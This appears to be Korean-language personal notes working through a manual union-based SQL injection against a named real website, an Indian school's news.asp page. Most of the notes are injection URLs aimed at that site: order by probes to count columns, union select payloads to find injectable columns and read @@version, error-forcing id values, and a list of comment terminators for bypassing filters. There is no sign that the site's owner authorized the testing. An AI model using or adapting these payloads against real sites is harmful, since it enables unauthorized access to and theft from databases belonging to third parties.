-공격 포인트
http://www.bsetbarapada.ac.in/news.asp?id=141

-컬럼 개수(order by 이용) -> 컬럼 정렬

http://www.bsetbarapada.ac.in/news.asp?id=141 order by 1-- (O)

http://www.bsetbarapada.ac.in/news.asp?id=141 order by 20-- (X)

http://www.bsetbarapada.ac.in/news.asp?id=141 order by 15-- (O)

http://www.bsetbarapada.ac.in/news.asp?id=141 order by 16-- (X)

컬럼 개수 - 15개

-공격 가능한 컬럼 (union select) - (쓸 수 있는 컬럼, 취약한 컬럼, 유효한 컬럼)

http://www.bsetbarapada.ac.in/news.asp?id=141 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--

-공격 가능한 컬럼 확인법

version()/ @@version
http://www.bsetbarapada.ac.in/news.asp?id=141 union select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15-- (X)

http://www.bsetbarapada.ac.in/news.asp?id=141 union select 1,2,3,@@version,5,6,7,8,9,10,11,12,13,14,15-- (O)

-에러 유발 --> 에러 유발 인자를 이용한 에러 유발

http://www.bsetbarapada.ac.in/news.asp?id=-141 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
-> 마이너스

http://www.bsetbarapada.ac.in/news.asp?id=99999999 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
-> 터무니 없는 값

http://www.bsetbarapada.ac.in/news.asp?id=null union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
-> null 값

http://www.bsetbarapada.ac.in/news.asp?id= union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--
->defualt 값

인젝션
1)싱글 쿼트 공격
2)더블 데쉬 공격

습관적으로 ' 를 붙이고 안되면 주석 처리를 바꿔준다.
주석 종류 : --, #, /* */, --+, ---, --+-, %23(#), ;
ex) level2.php?showprofile=-4' union select 1,2,3,4--+
order by 1.에러 유발 인자 2.주석 처리

